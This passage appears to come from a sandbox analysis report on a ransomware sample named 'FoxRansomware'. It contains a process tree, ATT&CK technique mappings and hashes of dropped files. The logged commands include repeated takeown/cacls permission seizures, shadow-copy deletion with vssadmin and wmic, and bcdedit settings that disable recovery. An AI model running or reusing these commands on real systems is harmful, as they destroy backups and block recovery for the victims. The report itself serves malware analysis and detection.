  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3928
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2676
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:440
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    - Modifies file permissions
    PID:332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:1068
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:2800
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:2316
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Modifies file permissions
    PID:1592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner
    3⤵
    PID:3312
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "background.png" -nobanner
      4⤵
      PID:2740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2380
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:812
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1156
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:844
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:3924
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:1964
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:3024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    - Modifies file permissions
    PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:2000
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:3864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4152
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3252
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    PID:2328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:3000
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:4048
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:3400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:3188
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:892
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:3616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "main.css" -nobanner
    3⤵
    PID:3160
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "main.css" -nobanner
      4⤵
      PID:3740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1996
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:4200
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    PID:3164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:1268
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3260
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""
  2⤵
  PID:4288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"
    3⤵
    PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:4300
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:4328

C:\Windows\system32\taskeng.exe
taskeng.exe {E611BE7D-FEF3-478E-965D-B30C774A9501} S-1-5-21-1603059206-2004189698-4139800220-1000:AILVMYUM\Admin:Interactive:[1]
1⤵
PID:568
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\fMynkeEd.bat"
  2⤵
  PID:2972
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:3348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2292
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3296
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2348
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:4152

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C
1⤵
PID:1748

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"
1⤵
PID:2880

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf

Filesize
8KB

MD5
2cb329dff6324938c420b375731911ff

SHA1
85cf6dc6157894a383a074573f36f13df1350bab

SHA256
0454a01a2477d8898ddfe91b1816b68de69551527aed3564cbd0ed61a234faaf

SHA512
83ea367f13b278d7b5061351e1dc651ebe11b12c699adef643fa2a8b91f49f4f2c999786ce57ad0b244b5a394846e940d21c4a9863a4c67033bb19083e42e2aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Wo6r9M7V.txt

Filesize
14B

MD5
c74dacdd9331a6698efffe81ff66ac08

SHA1
79e8ce4bb5cc2436e95fad4a74a31aee7aa63043

SHA256
82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c

SHA512
24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_66FCC65BF7EE05F7.txt

Filesize
565B

MD5
a7103cec20dcde9ef96b218bf30c774a

SHA1
51a60f922aa5877e15516c1c71924901c0a05e7a

SHA256
579051428f8b2c8edccd1ff265b286562665dfc318d58c0ef8ce2da128cda692

SHA512
e887368fe998598417f5afa8a29d54327445094a8789ebd8b05b86ffd2c92f8870db97b497f2f5d99495d09f31ac0178698f860448e131002109a9a5b1ba75cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_66FCC65BF7EE05F7.txt

Filesize
1KB

MD5
501ae4724b233030c3dc4f770ba54865

SHA1
73d88e9df2028f58038d94326289c2747926fd00

SHA256
c08926a901c8e38861bb20e27d93c491246c292163b8c3ac328cdf8e7d3d41c8

SHA512
0326b9f9fd07e9767a73df9117ff2e77a4a34d97a9a88bb9507dae62d6b09ae8644d90c3f18890777966b6f7302278d1d7b0de7059df8581ca7e34e857177779

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_66FCC65BF7EE05F7.txt

Filesize
2KB

MD5
55ed6bebab5ed8150defece70727ac2f

SHA1
58feedece8dc1031c7976f6820086d240d56dc90

SHA256
90626b22c7ea46303fd971194d58d39658811f13ebbf77423a5e656a1f8f74e3

SHA512
a4b98c10ff55674a5dcde318d7489a91c19181980d8b50a03f49528270e1fb3e5d0b5cfefe3b3339563fea783c8bf3acb565368f4920aa6be8674bb3c1536349

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_66FCC65BF7EE05F7.txt

Filesize
2KB

MD5
759143ae6bba3ffc9773585f5c2a93c7

SHA1
3c20261b40fb0fda50afff0dd9e313554ef29eee

SHA256
83ce5834f340ba8af97aeee4d7a38cd09f7da8b581ee30e48c35f8d67dc3a3aa

SHA512
ba7e743a53fa71e6348a92feaf5973e29254a3a722992faee1ef10d3091311c80cdd0df2e587a144e9112306de4144f6d402f2a8ccb66d8cc6a5847953ab82f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_66FCC65BF7EE05F7.txt

Filesize
2KB

MD5
939ab114345a22c84e9eddd57f01be33

SHA1
33e62a5b098a67d32d847cd3069f60e12e34d237

SHA256
c5140a709db4c29e84d689ae03fadaa002da7bdcec481d0f40cf60d09c1e6248

SHA512
b7c8787a02ae07037c636b4f2b2942967996e41bb5d641acc45224a37d1e236c2086cabdbbf3ad4029eb310e078950638a6c1281cdd70e5a177e40d7f0334d42

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\bad_66FCC65BF7EE05F7.txt

Filesize
3KB

MD5
1e6a6ce9afa8582f115fe72732de44c1

SHA1
f8460eebfd1e840579a0ad4dcee5395dda1d42c9

SHA256
bed3c3d721a5c56dd0a5f3514abcbec507ddd4bbb12ef248e3833854dbfc282c

SHA512
1159862f20e0cf2136c02d31d38a533b02014dd5719422dd9b91fdb3a801ca4995b9ad943679c22b813a2033350fe56ffc5269a7acecbd007ccc5cd27e55d01d

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_66FCC65BF7EE05F7.txt

Filesize
24KB

MD5
dee33529c954757369289322ac01ad10

SHA1
278d129cb4bd3663a7d096123a6fae4bbd328c2d

SHA256
a1fcb24f3b4d28cf34f9d929d9e755b190aa57182ef4752a766c741f19efd063

SHA512
9bfb4787e3394a2f294511d337f236cb961c383a7b06d67803a2892fcdbecc69c5cbe58cffc589752175ec4b673f827f9e8ed4387a0d690b524c2d43a50aa734

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat

Filesize
226B

MD5
8b509c42079f037beeced07732dbff55

SHA1
dbd88c6e253b98523da97b9ece9aa5e28f87013a

SHA256
220112d110567da3fc62869640e8d45ea1b2d84c250dd04f6632f46ca1c0c850

SHA512
566587d254f3103017ccf1bc8db0fe1e0b2db313598337b01ecf83fc5e28f2e5f3094d98fc98746cf495d760f0fb3776752e3392b8dc560969f7eb608712e99a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe

Filesize
64KB

MD5
39384617afb7b1a4cd7b11d998292e13

SHA1
87689603aebba6b353bbca3d5a038c0e8e59fd4c

SHA256
b41666aedfb669305f37349dfae96eea3f34ae7ba89629a268c2a403302bdbaa

SHA512
52be3914e3330330a83463cc2925ffa5d0bdb1a4358f48c1298cc0c5f631a214a8d9328232f95c496642da2300f713a5f0288d6ea6af52fb0e173c1431e442e7

Download Submit
C:\Users\Admin\AppData\Roaming\fMynkeEd.bat

Filesize
265B

MD5
ddc055839f38898e4cd9133a738f1e10

SHA1
c5781213e840f9fa2d3bb8f75aaffc37eb9d4455

SHA256
861f3fc0f6af2afa948352206930666a34e145f58afed65e00b92da72955afa9

SHA512
7c6b02853a536a606110d29a6934132986e01f4c858c1f7ae63d550e6862cd19763cf03a2218b28f5c7bf9f834c75b563ab7bb89b14b9d43e5961009d2509089

Download Submit
C:\Users\Admin\AppData\Roaming\kixASbnx.vbs

Filesize
260B

MD5
a5daac56df939fb556da529481ead84a

SHA1
5b57309009abc7e0edef430f914ef62c3bfd7313

SHA256
9bdb20b60519bb326b8713d9fc9543a161b84bf782e9d31ed7cd8f57a3c12b55

SHA512
05f2ce16cda3f5261815237d93ecd4579ad5d19291880b6dd4e44b6d88d0286a42cff3a561f3ea93a4a09594aba8ede86d9445ee633f5113bbcaa54b44a17642

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\NWaVfX3D.exe

Filesize
1.2MB

MD5
c82d64850d35cc6a536c11adbd261cf6

SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe

SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1

SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002

Download Submit
\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\sOCkujKF64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
memory/108-7972-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/440-8012-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/528-8003-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/692-7985-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/712-7993-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/776-6392-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/776-6393-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/812-8032-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/852-1628-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/852-4965-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/968-8004-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1112-8010-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1112-8011-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1144-7956-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1176-4580-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1176-5114-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1176-4582-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1420-7989-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1456-8021-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1536-7984-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1540-8063-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1588-4882-0x00000000002A0000-0x0000000000317000-memory.dmp

Filesize
476KB

Download
memory/1884-7980-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1912-8009-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1932-8079-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1952-5958-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2012-8059-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2012-8057-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2016-4099-0x0000000001F30000-0x0000000001FA7000-memory.dmp

Filesize
476KB

Download
memory/2088-5496-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2112-7978-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2148-2552-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2148-7953-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2148-9-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2148-5497-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2236-5941-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2268-5756-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2268-4889-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2292-5759-0x00000000002C0000-0x0000000000337000-memory.dmp

Filesize
476KB

Download
memory/2292-4890-0x00000000002C0000-0x0000000000337000-memory.dmp

Filesize
476KB

Download
memory/2304-8020-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2316-4973-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2344-8-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/2372-7966-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2412-5072-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2412-7967-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2412-4397-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2412-7968-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2460-12-0x0000000074330000-0x00000000748DB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-13-0x0000000074330000-0x00000000748DB000-memory.dmp

Filesize
5.7MB

Download
memory/2460-14-0x0000000002710000-0x0000000002750000-memory.dmp

Filesize
256KB

Download
memory/2460-15-0x0000000002710000-0x0000000002750000-memory.dmp

Filesize
256KB

Download
memory/2460-16-0x0000000074330000-0x00000000748DB000-memory.dmp

Filesize
5.7MB

Download
memory/2516-8006-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2548-7994-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2596-8013-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2632-5499-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/2632-4885-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
